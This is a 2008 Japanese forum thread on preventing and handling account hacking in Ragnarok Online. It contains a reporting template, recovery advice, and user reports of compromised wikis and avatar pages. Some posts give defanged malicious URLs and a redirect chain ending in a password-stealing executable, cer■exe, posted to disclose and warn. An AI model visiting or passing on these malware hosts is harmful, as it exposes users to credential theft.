（○口○*）さん <>sage<>08/06/13 22:18 ID:hCVMN6tV0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例及びセキュリティ全般の
話題を取り扱います。

・関連＆参考情報アドレス (>>2)
・報告用＆質問用テンプレ (>>3)
・アカウントハック対応の要点とFAQ、簡易まとめ (>>4,>>5)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。

【過去スレ】
アカウントハック総合対策スレ9
　http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/
セキュリティ対策、質問・雑談スレ5
　http://enif.mmobbs.com/test/read.cgi/livero/1205488101/
それ以前のログはROセキュリティWiki(http://rosafe.rowiki.jp/)へ <>アカウントハック対策・セキュリティ総合スレ（○口○*）さん<>sage<>08/06/13 22:18 ID:hCVMN6tV0<> 【参考アドレス】
・ROセキュリティWiki
　　http://rosafe.rowiki.jp/
・ROアカウントハック報告スレのまとめサイト
　　http://sky.geocities.jp/vs_ro_hack/
・ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト(臨時)
　　http://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより)
　　http://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
　　http://lineage.paix.jp/
・セキュリティホール memo
　　http://www.st.ryukoku.ac.jp/~kjm/security/memo/
・アンチウィルスメーカー各社検体提出先
　　http://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

【このスレでよく出てくるアプリケーション】
・PeerGuardian2
　　http://sky.geocities.jp/vs_ro_hack/pg2.htm

【PCにウィルス対策ソフトを導入してない方へ】
・Kaspersky Internet Security 試用版
　　http://www.just-kaspersky.jp/products/try/
・カスペルスキー：オンラインウイルス＆スパイウェアスキャナ
　　http://www.kaspersky.co.jp/scanforvirus/
・NOD32アンチウイルス体験版
　　http://www.canon-sol.jp/product/nd/trial.html <> （○口○*）さん<>sage<>08/06/13 22:19 ID:hCVMN6tV0<> 【投稿の際の注意】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
　加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
　.(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質
　に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

　----------報告用テンプレ----------
● 実際にアカウントハックを受けた/怪しいアドレスを踏んだ時の報告用

【　　　気付いた日時　　　　　】 (被害に気付いた日時)
【不審なアドレスのクリックの有無　】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【　　ツールの使用の有無　　　】 (Yes/No、Yesの場合はそのToolの説明)
【　ネットカフェの利用の有無　　　】 (Yes/No)
【　　　 OS　　】 (SP等まで書く)
【使用ブラウザ】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【　アンチウイルスソフト】 (NortonInternetSecurity2007 等)
【その他のSecurty対策】 (Spybot S&D、ルータ、等)
【ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無　[有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】 (被害状況を詳しく書く) <> （○口○*）さん<>sage<>08/06/13 22:19 ID:hCVMN6tV0<> 【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

　・アドレスをホイホイ踏まない。よく確認する。
　・出所の怪しいプログラムやスクリプトを実行しない。
　・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う
　・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う
　・パーソナルファイアウォールソフトの導入する
　　　・hostsの利用した危険ドメインのブロック
　　　・PeerGuardian2を使った危険IPのブロック　など
　　（※hostsは定期的な更新が必要です。更新をサボりがちな人はhostsファイル更新スクリプト
　　　　(http://acopri.rowiki.jp/index.php?hostsRenewScript)の導入も視野にいれましょう）
　・IEの使用を止め、他のブラウザに乗り換える(Firefox、Opera等)
　・IEを使う場合は下記を設定
　　・信頼できるSite以外ではスクリプトやActiveXを切る
　　　：インターネットオプションのセキュリティの部分で設定可能
　　・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
　　　：インターネットオプション→セキュリティ→レベルのカスタマイズ
　　　→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする <> （○口○*）さん<>sage<>08/06/13 22:20 ID:hCVMN6tV0<> 【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は関連サイトをご覧下さい。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
　1) 速やかに感染PCのネットワークケーブルを外す
　2) 『安全な環境』から諸々のパスワードを変更
　3) ウィルス駆除もしくは OSのクリーンインストールやPCの再セットアップを行う

注)
　・安全確認されるまでNetworkに接続・ROクライアント起動・公式にログインは厳禁
　・各種メッセンジャーソフトやメールクライアントの起動も避ける
　・変更するべき物は以下のとおり
　　『GungHo-IDパスワード』『アトラクションIDパスワード』『キャラパスワード』『メールアドレス』
　・アンチウイルスソフトの過信は禁物。自信がなければ再セットアップを第1選択枝とする事
　・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる

● 関連FAQ
・『安全な環境』ってどんな物？
　　ウイルスの感染が無いと思われる環境です。別PCや携帯電話・据置型ゲーム機・1CD Linux等が挙げられます。
・『安全ではない環境』ってどんな物？
　　インターネットカフェ等不特定多数が使用する環境。
　　また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
・知り合いに頼んでパスワード変更してもらうのはダメ？
　　いくら信頼できる友人でもパスワードを教えるのは良く有りませんし、その友人がウィルスに感染してないとも限りません。
　　知り合いに頼むのは最後の手段であり、安全な環境が構築出来次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目？
　　駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね？
　　100％の保証は出来ません。ウィルスが見つからなかった場合、チェックに使ったアンチウィルスソフトでは発見出来なかっただけです。
　　安全かどうか自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです。 <> （○口○*）さん<>sage<>08/06/13 22:25 ID:hCVMN6tV0<> テンプレを纏めてくれたセキュスレ980氏や他の人、乙でした <> （○口○*）さん<>age<>08/06/15 00:27 ID:QD9QBN5E0<> 前スレ埋まったのでage <> （○口○*）さん<>sage<>08/06/15 00:44 ID:AeToxp2v0<> 【　　　気付いた日時　　　　　】今しがた
【不審なアドレスのクリックの有無　】 No
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 Yes
【　　　 OS　　】 XP SP2
【使用ブラウザ】 Opera 9.27
【WindowsUpdateの有無】先週以前　最新の更新は当たってないはず
【　アンチウイルスソフト】 AVG8.0
【ウイルススキャン結果】現在カスペルスキーのオンラインスキャン中
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
受信メールをよく見てみたところ、７通のメールに「Part 1.2」などというファイル名のテキストが添付されていた
うち５通はガンホーアトラクションセンターからのもので、もう１通がガンホーゲームズメールマガジン、もう１通はプロバイダのUSENからのもの
開いたり保存したりはしていないから、厳密にはこれがテキストファイルなのかもわからない（アイコンが.txtと同じなだけ）
一体これは何なのだろう、何だか不気味だ
メーラーはThunderbird2.0.0.14です <> （○口○*）さん<>sage<>08/06/15 00:46 ID:IMkV7jgw0<> スレが変わったので、RO板TOPのリンク更新をお願いしてきました。

MMOBBS目安箱2
http://zaurak.mmobbs.com/test/read.cgi/manage/1164226754/200

>>8
メールソフト名を書け。SSでも貼れ。
多分、HTMLメールを分離してるだけだと思うが、メールソフト名もわからないから確認のしようがない。 <> （○口○*）さん<>sage<>08/06/15 00:49 ID:AeToxp2v0<> 書いてあるだろｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

もう１台のPCでもThunderbirdだけど、そっちではこの症状は出てない
もう１台のほうはカスペルスキーでこっちはAGVだから、俺はAGVが何か作用してるんじゃないかと睨んでるんだが… <> （○口○*）さん<>sage<>08/06/15 01:04 ID:AeToxp2v0<> もっとよく見てみたら、Part 1.2が付いてる７通だけ、本文の末尾に

「No virus found in this incoming message.
Checked by AVG.
Version: 8.0.100 / Virus Database: 270.0.0/1489 - Release Date: 2008/06/07 11:17」

とか書いてあった

どうやらAVGが仕事した痕跡と見て間違いなさそうだけどまぁ自己責任だよなぁ
触らぬ神に祟り無しだ
このテキストを開いてみようなどとも思わんが

一応、他にもThunderbirdとAVGを併用している方がいたら情報をいただければうれしいです <> （○口○*）さん<>sage<>08/06/15 01:14 ID:qMSxps280<> >11
ウィルスは見つからなかったと書いてあるが？
設定変えたらその辺りの挙動は変わるんじゃないかね。

AVGのチェックが不安なら、その添付ファイルを保存して
VTに投げればいい。

って、よくみたらテンプレにVT無い事に今気がついた。
Wikiのテンプレの方には入れておいた。

VirusTotal
ttp://www.virustotal.com/jp/ <> （○口○*）さん<>sage<>08/06/15 01:17 ID:AeToxp2v0<> 「No virus found in this incoming message.
Checked by AVG.」
くらい読めるっつーに
「このメッセージにウィルスは埋め込まれていない！　このAVGがそう言っているのだ！」
的な意味だろ
だから俺は「どうやらAVGが仕事した痕跡と見て間違いなさそう」と書いてるんだが

>>9も>>12ももう少しちゃんと読んでくれよ… <> （○口○*）さん<>sage<>08/06/15 01:25 ID:qMSxps280<> >13
だから、不安ならVTに投げればどうだ？と言ってる。 <> （○口○*）さん<>sage<>08/06/15 01:32 ID:AeToxp2v0<> おｋ
投げてみた

結果: 0/32 (0%)

つまりウィルスではないか、はたまた未知のウィルスか、ということか

まぁどこまでも自己責任ってことだな、うん <> （○口○*）さん<>sage<>08/06/15 01:34 ID:IMkV7jgw0<> ID:AeToxp2v0 の理解力のなさが悪印象に残った。 <> （○口○*）さん<>sage<>08/06/15 01:53 ID:AeToxp2v0<> 「AVG Thunderbird　Part1.2」でググったところあっけなく解決
AVGのウィルスチェックレポートだとかなんとか
眠くてあんまり脳が働いてないとはいえ、まずググりもしなかったのは完全に俺の落度だな

参考サイトなどには一応目を通したんだが正直ハクスレの内容とかほとんど理解できん
となると俺はやはり理解力に欠けるんだろうな…
PG2とかHosts変更とか導入したいけどさっぱり意味わからんし <> （○口○*）さん<>sage<>08/06/15 02:25 ID:prxCyIaW0<> 俺もわからんかったけど、ここのテンプレさんとか資料室さんで勉強したらなんとか理解できたよ。
すごくわかり易く解説されているのでじっくり読んで来なされ。 <> （○口○*）さん<>sage<>08/06/15 04:07 ID:30/IFPcG0<> >>17
導入するだけなら、こんなのもあるよ。

PG2導入解説動画（改訂版）
http://www.nicovideo.jp/watch/nm2825098

今はとりあえず、トラブルを未然に防ぐ対策だけでもやっておいて、知識は後から補う形でも損はない。 <> （○口○*）さん<>sage<>08/06/15 12:38 ID:jVJPNWid0<> セキュWiki見てフイタ。弓手Wikiは、わざとなの？ <> （○口○*）さん<>sage<>08/06/15 13:14 ID:qMSxps280<> 弓手Wiki、今は直ってるようだ。

恐らくspam.ini.phpに269gを追加した時に、まだ罠リンクが
残ってたんだろう。
あれは編集前と編集後で単語チェックするから、罠が残ってる
状態で設定すると、削除できない状態に陥る。

それと吹くのいいが「わざとなの？」はちょっと酷い言いようだと
思うぞ。 <> （○口○*）さん<>sage<>08/06/15 13:26 ID:jVJPNWid0<> 直ってない・・・と思ったら、ローカルキャッシュクリアしたら
直ってるな。しかし、タイムスタンプ変更しないで直したか・・・思いきや
差分　ttp://hunter.rowiki.jp/index.php?cmd=diff&page=%CB%C9%B6%F1%2F%C2%CE　が
おかしい。中の人が直接直したんだろうか？そうすると、キャッシュ関連で「直ってない」状態になるから
危険だよなぁ。 <> （○口○*）さん<>sage<>08/06/15 13:52 ID:nZ/I/0gy0<> なるほど. 今日の昼にこっそり（多分ここを見たのか？）直したんだろうね.
でも直したならタイムスタンプが変わっていて欲しいね.
確かにキャッシュ無視の強制リロードが必要だった. 差分は, 見ると勘違いするしね. <> （○口○*）さん<>sage<>08/06/15 14:06 ID:HtANcAQn0<> 今朝(2時～3時ぐらい)にそこ見たけど何もなかった。
キャッシュが変に作用したなら、修正は昨日のうちに行われていたんじゃないか？ <> （○口○*）さん<>sage<>08/06/15 17:01 ID:30/IFPcG0<> 改竄と修正がある度に、Wikipedia(というかMediaWiki)と同様にPukiWikiでもrevertが出来たら……
と思ったら、既にプラグインがあった。
ページをリバートするPukiWikiプラグイン "revert.inc.php" - luntf.com
ttp://www.luntf.com/?revert.inc.php
これ、各Wikiでも導入を検討してもらえないものかな。 <> （○口○*）さん<>sage<>08/06/16 20:53 ID:FHDp0GE+0<> >25
便利そうだが、かえって改竄の恐れが増えないか？
ハクに限らず一般的な意味も含めて、だが。
それに簡単に罠ページにロールバックされるとか、起きそう。

直すときにそれがあれば楽なので、Wiki管理人には導入を
検討してもらいたいが、悪戯的なトラブルが増えないかが
ちょっと気になった。 <> （○口○*）さん<>sage<>08/06/16 21:15 ID:/mwAW6aQ0<> VirusTotalにバスター追加されてるｗ <> （○口○*）さん<>sage<>08/06/16 22:43 ID:w02KjoY20<> おいおい、バスターとVirusBusterは違うぞ。
バスターはPC-cillinなんだぜ。

……と内心ツッコミ入れつつ見に行ったら

>TrendMicro

Σ(ﾟдﾟlll)　マジだ

これでやっと御三家が揃ったわけか <> （○口○*）さん<>sage<>08/06/16 23:00 ID:JMd7ye3oO<> 何故か俺の環境ではvirus.orgが開けなくなったから
バスター追加はありがたい <> （○口○*）さん<>sage<>08/06/16 23:07 ID:wv3wnQpu0<> キングソフトも乗ってくれないかなぁ。検出率がわからなくて、他人に勧めていいかわからんｗ <> （○口○*）さん<>sage<>08/06/16 23:48 ID:0sBX0mZc0<> >キングソフトも乗ってくれないかなぁ

つ ttp://virscan.org <> （○口○*）さん<>sage<>08/06/16 23:51 ID:wv3wnQpu0<> >>31
thx

>>29
PG2が中国のIPってことで弾いてたよ。 <> （○口○*）さん<>sage<>08/06/17 02:00 ID:NgL4jzkH0<> カスペさんのオンラインスキャンはまだ直らんのかね、そういや <> （○口○*）さん<>sage<>08/06/17 07:48 ID:2t5OlZcI0<> つ
ttp://www.kaspersky.com/virusscanner/
ttp://www.kaspersky.ru/virusscanner/ <> （○口○*）さん<>sage<>08/06/17 16:00 ID:jnCSTAfE0<> うちのではその二つもできないな <> （○口○*）さん<>sage<>08/06/17 16:52 ID:2t5OlZcI0<> Firefox3.0リリース <> （○口○*）さん<>sage<>08/06/17 18:13 ID:2t5OlZcI0<> XREA対応した模様。 <> （○口○*）さん<>sage<>08/06/17 18:58 ID:YD4qKV6Z0<> >>37
アナウンスでてたね
http://sb.xrea.com/showthread.php?t=12839 <> （○口○*）さん<>sage<>08/06/17 19:03 ID:6j890I2O0<> >>38
すっごい　、　が多いな…
逆に読みづらい。 <> （○口○*）さん<>sage<>08/06/17 19:13 ID:5JG9H01X0<> 公式アナウンスやっとでたか
あのまま放置決め込むのかと思ったよ

xreaは個人的に嫌いじゃないんだが、最近は安定性やら何やら微妙に
なってきてるなぁ
しかしあの告知見ると、そのうち無料鯖は廃止とかになりそうだな <> （○口○*）さん<>sage<>08/06/17 20:08 ID:2t5OlZcI0<> 言い訳まみれだなぁ。 <> （○口○*）さん<>sage<>08/06/17 20:13 ID:mJ5f4pOR0<> サーバー数みたら260とかなってるのな…、大分増やした物だ <> （○口○*）さん<>sage<>08/06/17 21:05 ID:2XFjt4e50<> 今の募集はs342か。
ナンバリングが１から綺麗に繋がってるとして、coreserverの方も
合わせたら軽く350以上か。

その大半が無料ユーザーで赤字部門。
有料の方もxrea+で年間2400円とかだし。

経営が成り立ってる方が不思議って気もする。 <> （○口○*）さん<>sage<>08/06/17 23:19 ID:R/XiqCjW0<> ところでXREA使ってるWikiとRO系のページはいくつあるんだろうな

わかる範囲で軽く30は超えてるんだが <> （○口○*）さん<>sage<>08/06/17 23:20 ID:mJ5f4pOR0<> 金払ってる人、自動だとRMT広告が入るの嫌で指定してる人
なんてのもいるんじゃないかな？ <> （○口○*）さん<>sage<>08/06/18 05:26 ID:pSayHY6W0<> xreaはあくまで副業であって、本業のValueDomainがあってこそ成り立っているサービスではあるが。
ただ、PHP周りの自由度が高い無料鯖ゆえに、指摘されているようなspam利用が多いのも事実。
以前に上位レジストラからDNS抹消を行われた時も、spamが遠因になっていたし。
タダほど高いものは無い、と言う感じで無料サービス廃止に向かうのも時代の流れかもしれない。 <> （○口○*）さん<>sage<>08/06/18 19:46 ID:j0GOSbtZ0<> 金を払わずに利用しようって客が多くなりすぎたな。
仕事にはちゃんと対価を払う文化にならないと、この先何が起こるかわからんね。 <> （○口○*）さん<>sage<>08/06/18 22:11 ID:/LXmd/170<> ROで課金してる人は皆さん、ガンホーゲームズの中でアバターを作って、
「マイHP」というのを作らされてると思いますが

その中のプロフィール欄やら日記に罠ブログのURLを書いておき、
友達申請を誰彼構わずして、訪問させて踏ませる輩がいます。
ご注意いただきたいと思います。

わかったのは、だんなが踏んでカスペさんに叫ばれたから…orz
(だんなはRO引退後、癌の無料ゲームユーザー) <> （○口○*）さん<>sage<>08/06/18 22:27 ID:QIx5Rx/s0<> >>48
そんなの今に始まった事では…。
昔の方が多かったです。 <> （○口○*）さん<>sage<>08/06/18 22:55 ID:/LXmd/170<> >>49
既出だったのですね、申し訳ありませんでした <> （○口○*）さん<>sage<>08/06/18 23:03 ID:kPItGfaT0<> >>48
いまだにアバター製作をキャンセルし続けている俺みたいのもいますけどね。 <> （○口○*）さん<>sage<>08/06/18 23:34 ID:p2gtTXcn0<> 各職Wikiのリンクにtp://goddessmaria■269g■net/というURLになっています
これはアカウントハックURLなんでしょうか？Ro起動したままふんでしまいました <> （○口○*）さん<>sage<>08/06/18 23:37 ID:tWzsm1NE0<> 修正のために何処のWikiだったかを教えていただけませんでしょうか？
いくつか見て来たけど見当たらなかったので。 <> （○口○*）さん<>sage<>08/06/18 23:39 ID:GQMGW42n0<> ■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

各職などと曖昧な表現をせずハッキリと

一月ほど前のcer.exeをDLさせようとしてくる様子
あとはテンプレにそった報告してくれないとわからないわ <> （○口○*）さん<>sage<>08/06/18 23:46 ID:p2gtTXcn0<> 勇気が無くて見れないサイト解説スレはどこにあるんでしょうか？

【　　　気付いた日時　　　　　】今
【不審なアドレスのクリックの有無　】有
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 No
【　　　 OS　　】ウィンドウズXP
【使用ブラウザ】 IE
【WindowsUpdateの有無】無
【　アンチウイルスソフト】無
【その他のSecurty対策】無
【ウイルススキャン結果】していません
【スレログやテンプレを読んだか】今から読みます
【hosts変更】無　
【PeerGuardian2導入】無
【説明】殴りアコプリWikiからリンク→プリーストWikiのRinkで>>52のURLを踏んでしまい
急に重くなり強制終了しました。そのブログには絵が描いてあって普通のブログみたいな感じでした・・ <> （○口○*）さん<>sage<>08/06/18 23:47 ID:tRI6KZO/0<> >50
癌公式のそれで罠踏ませるのは、初の報告じゃないかな？
ただ手法的にはmixiやらで散々使われてるものなので
そういう意味では既出とも言える。

しかし公式のお膝元だし、癌がそれを放置してるとなれば
別の意味でヤバいわけで。

まあ何にせよ、旦那さんのPCのチェック等々頑張ってら。
後、貼られてたアドが初見かどうかの問題もあるので
罠URLが判るなら、一応テンプレに沿って報告お願いします。

>53
セキュWikiには、殴りアコプリWikiがやられてたとあった。
>殴りアコプリ　MenuBar改竄→修正済(18日)。今回も *■269g■net への改竄。

他にもあるのかもしれないが、まだ見つけられず。 <> （○口○*）さん<>sage<>08/06/18 23:48 ID:GQMGW42n0<> 【使用ブラウザ】 IE
【WindowsUpdateの有無】無
【　アンチウイルスソフト】無
【その他のSecurty対策】無

この状態で踏んでるならアウトとしか判断しようがないかと… <> （○口○*）さん<>sage<>08/06/18 23:51 ID:p2gtTXcn0<> >>57
アウトという曖昧な表現をせずハッキリと
自分で言ってましたよね <> （○口○*）さん<>sage<>08/06/18 23:54 ID:VDjeMEIu0<> なんだこいつｗ
神聖かよｗｗｗ <> （○口○*）さん<>sage<>08/06/18 23:58 ID:tWzsm1NE0<> >>55
さすがにウィンドウズアップデートもセキュリティソフトもないならば確実に喰らっていると思います。
ROにログインしている常態で踏んだのであれば、
そこからまたログインしなおしたり、アトラクションセンターにログインを試みなければまだ大丈夫。
とりあえずパスワードを入力する系のページやゲームやメッセンジャーなどには一切ログインせず
リカバリやOSの再インストするしかないですね。
ゲームにしろメッセンジャーにしろメールソフトにしろログイン系の行動を試みてはいけません。

勇気がなくて踏めない人のための鑑定スレは2chのネットワーク板などにあります。

あと、アウトというのは完全に感染しているという意味です。曖昧では無いです。

あとちょっとケンカを売っているような物腰に見えます。
焦っている気持ちはわかりますが、落ち着いてテンプレなどを読み、
キッチリした情報を書いてくれれば皆さんキッチリ答えてくれます。
まずは落ち着きましょう。 <> （○口○*）さん<>sage<>08/06/18 23:59 ID:p2gtTXcn0<> >>60
ありがとうございました <> （○口○*）さん<>sage<>08/06/19 00:10 ID:ggqtvPiT0<> >ID:tRI6KZO/0
パニックして、逆上しないように。

>54が書いてるように、EXEをDLさせる罠

一応普段のように並べてみると
goddessmaria■269g■net
-->www■teamerblog■com/blog
---->www■panslog■net/wiki/index1■htm　(Trojan-Downloader.JS.Agent.brl)
------>www■teamerblog■com/wiki/cer■exe　（Tojan-PSW.Win32.OnLineGames.aosg）

index1■htm　VT19/32　http://www.virustotal.com/analisis/44568c13c870b29aba5bb84c56d8fc93
cer■exe　VT23/33　http://www.virustotal.com/analisis/90e1a6b432bc06d7103cfb112613e4a6
ノートンは擦り抜けるが、他はほぼ検出。

対応方法は>60の言うとおり。
安全な環境からPASS変更して、PCはHDDフォーマットの上OS再インストールが一番堅い。

昨今のネットを取り巻く環境では、ノーガード戦法は自殺行為。
WindowsUpdateの適用とアンチウィルスソフトの導入は、必須の行為だよ。 <> 48<>sage<>08/06/19 00:51 ID:dkoX0G5o0<> >>56
お言葉に従い報告してみます

【　　　踏んだ日時　　　　　】 2008/6/15(日)
【不審なアドレスのクリックの有無　】有り　http://rakushushun■269g■net　
　　　　　　　　　　　　　　　　　　　　　　別のキャラ　http://www■voiceblog■jp/rakushushus/
【　　　 OS　　】 Windows XP SP3
【使用ブラウザ】 IE7
【WindowsUpdateの有無】 6/11の最新分まで済み
【　アンチウイルスソフト】 Kaspersky Internet Security 7.0
【その他のSecurty対策】 Spybot S&D、ルータ
【ウイルススキャン結果】検出されず
【スレログやテンプレを読んだか】愛読してます
【hosts変更】(有　昨年末辺りまでしか)
【PeerGuardian2導入】無
【説明】
>>48にあるとおり、身内が家族共用のPCで踏みました。カスペルスキーが遮断したとの警告音を発して判明しました。
ガンホーゲームズの中のマイHPというコーナーで、日記とプロフィールの欄に「ブログはこちら」などという感じで上記のアドレスが記述されていました。
日曜日に踏んだアドレスはoから始まる無意味な羅列ものでしたが、今は上段のものに差し替わっています。
最後が269g■netで終わるのは同じです。

踏んだ当日にガンホーのWEBヘルプデスクから報告しました。
(サポートセンター→WEBヘルプデスク→GungHo Games→報告する→不正行為を報告する)
日記の削除は行なわれていますが、プロフィール欄のURLは削除されても別のアドレスが書かれているようです。
また、URLの自動リンクを踏んだ時には「外部のサイトになるけど安全ですか」のワンクッションページがガンホー側で出るようになっていますが、身内は確認せずに踏んだようです。
尚、ワンクッションページから先が不正なリンクであればそのページから通報できるようになっていました。(身内はここから通報済み)

↑のアドレスに別のキャラと書きましたが、私の確認できた範囲ではこういう輩が2キャラいました。いずれのキャラも「マイ友だち」が多く(いきなり申請されても気軽に受理する人が多いようです)、それも騙される一因になっているように思います。 <> （○口○*）さん<>sage<>08/06/19 01:10 ID:ggqtvPiT0<> >63
rakushushun■269g■net
--->www■teamerblog■com/blog/
以下略

www■voiceblog■jp/rakushushus/
--->www■teamerblog■com/blog/
以下略

カスペが検出してるので、ほぼ平気と思われる。

それと
>【hosts変更】(有　昨年末辺りまでしか)
hostsは>4にも書かれてるけど、基本的に手動更新。
一度設定したからといって、その後OKというものじゃないので
要注意。

しかし、あの公式アバターサイト、活用されてるのか……
ちょっと意外だった。 <> （○口○*）さん<>sage<>08/06/19 11:35 ID:y8nq04OV0<> Firefox 3に早くもゼロデイの脆弱性、任意のコード実行の恐れ
ttp://www.itmedia.co.jp/news/articles/0806/19/news034.html <> （○口○*）さん<>sage<>08/06/19 15:15 ID:EyrgCACv0<> カスペオンラインスキャン出来るようになったね <> （○口○*）さん<>sage<>08/06/19 15:29 ID:nW8rH5DE0<> >>65
Firefox2にも同じ穴あり。
内容は流通していないので、広まらずに塞がれるのを待つのみ。

情報は共有できた方が良いが、危険度の高いものはあまり明かさない方がいい。 <> （○口○*）さん<>sage<>08/06/19 16:32 ID:410nvYt+0<> >>66
マジで？
俺さっき試してもまだできない。 <> （○口○*）さん<>sage<>08/06/19 16:36 ID:AlmQDrMu0<> 一旦アンインスコすればできるぜ <> （○口○*）さん<>sage<>08/06/19 20:19 ID:410nvYt+0<> おｋ、できた。thx <> （○口○*）さん<><>08/06/19 22:09 ID:NSf0p+pa0<> すみませんが質問です。
先日携帯ゲームのWikiにてウィルスに感染してしまいました。

"Trojan-Clicker.HTML.IFrame.il"

"Trojan-Downloader.JS.Agent.brl"

の2つが見つかったのですが、この2つは垢ハックのウイルスでしょうか？
ご存知の方いましたらよろしくお願いします。 <> （○口○*）さん<>sage<>08/06/19 23:43 ID:v0xcD5Pb0<> >>71
ぐぐーるしてみたら
アカウントハック総合対策スレ9
っていうのが出てきたよ <> （○口○*）さん<>sage<>08/06/20 12:22 ID:ptNFB2xO0<> Safari3.1.2リリース <> （○口○*）さん<>sage<>08/06/21 00:26 ID:zMHK5RFo0<> まだ報告出てなかったか

>MS、6月の月例パッチ「MS08-030」の修正版を公開
>http://internet.watch.impress.co.jp/cda/news/2008/06/20/20015.html <> （○口○*）さん<>sage<>08/06/21 01:47 ID:X10lZj+H0<> XREAを食ったfccjaのswfとトロイが18日に更新されている。
XREAがまたやられるってのはちょっと考えにくいので
どこか別なところがやられる(またはやられている)予感。 <> （○口○*）さん<>sage<>08/06/23 15:32 ID:/b80vvNz0<> 保守 <> （○口○*）さん<>sage<>08/06/23 19:56 ID:y9QG0BBi0<> 今更感が強い記事だが、先日のFlashの件もあるので貼り

>「PDFウイルス」に気を付けろ
>ttp://pc.nikkeibp.co.jp/article/trend/20080609/1004520/

最後にちょっと良いこと書いてあった

>現在は、ソフトウエアの脆弱性を悪用するウイルスが“全盛”の時代である。>Adobe Readerに限らず、自分が利用しているソフトウエアを把握し、それら
>すべてを最新の状態に保つようにしたい。

ふと気になってAdobeのサイトで確認したら、AdobeReaderの8系列は
Win2kSP4以降なんだな（SP2,3は7系列まで）
MSのサポートが切れてるOSは脆弱性があってもサポートされないが
こうやって日常的に使うソフトがサポートされずに放置されるのを見ると
旧OSを使い続けるのは恐ろしいとしか <> （○口○*）さん<>sage<>08/06/23 20:35 ID:Og43RMYs0<> ぜ、脆弱性･･･ <> （○口○*）さん<>sage<>08/06/23 21:10 ID:FzPaTnOb0<> >77
去年か一昨年か、IPAがWin98使い続けると危ない、と注意喚起の
発表出してたしな。
サポート切れたOSは自然と他のソフトも対応しなくなるし。

でも9x系OSとか、まだ現役とかいう人も多いんだろうなぁ…… <> （○口○*）さん<>sage<>08/06/23 21:28 ID:UQyEg4Jr0<> 旧OSの切り捨てはMicrosoftよりサードベンダのほうが早いよな。
2000はWindowsUpdateで今でもセキュリティパッチ降ってくるけど
なんとかPlayerはXP以上とかなってて。
そそ、Shockwave(FlashじゃなくてDirectorのほう)が更新されてた。 <> （○口○*）さん<>sage<>08/06/23 22:43 ID:UQyEg4Jr0<> いちおうURI
ttp://www.adobe.com/shockwave/download/ <> （○口○*）さん<>sage<>08/06/24 00:51 ID:1NIiH1Qv0<> >>79
完全に動かなくなるまで寿命じゃないと思ってるからだろう。
で、「メーカーの都合でなんで買い換えなきゃならないんだ。
そんなに重要ならタダでよこせ」という発想になると。 <> （○口○*）さん<>sage<>08/06/24 00:54 ID:NuIhrB280<> 外部のネットワークに接続しない環境で9x系が使われているのは結構あるな <> （○口○*）さん<>sage<>08/06/24 05:11 ID:l9nefxWS0<> 知り合いがハックされたんだが、課金切れだったのを１DAYで課金してあったらしい

律儀に課金すんのか最近の垢ハックは･･･ <> （○口○*）さん<>sage<>08/06/24 05:20 ID:SyesSzWw0<> 癌ID事やられてたらしてくるだろ、垢次第だけど向こうはそれ以上の金になるわけだし <> （○口○*）さん<>sage<>08/06/24 09:14 ID:iTsTY6Hy0<> >癌ID事やられてたらしてくるだろ
これの線が濃厚だと思う。
GungHo-IDがハクされたら、アトラクションIDのPassなんて関係ない。 <> （○口○*）さん<>sage<>08/06/24 14:52 ID:ildQKPme0<> 特定のワード(垢白URL)があると書き込めないようにする
Wikiのプラグインとかないのかな。
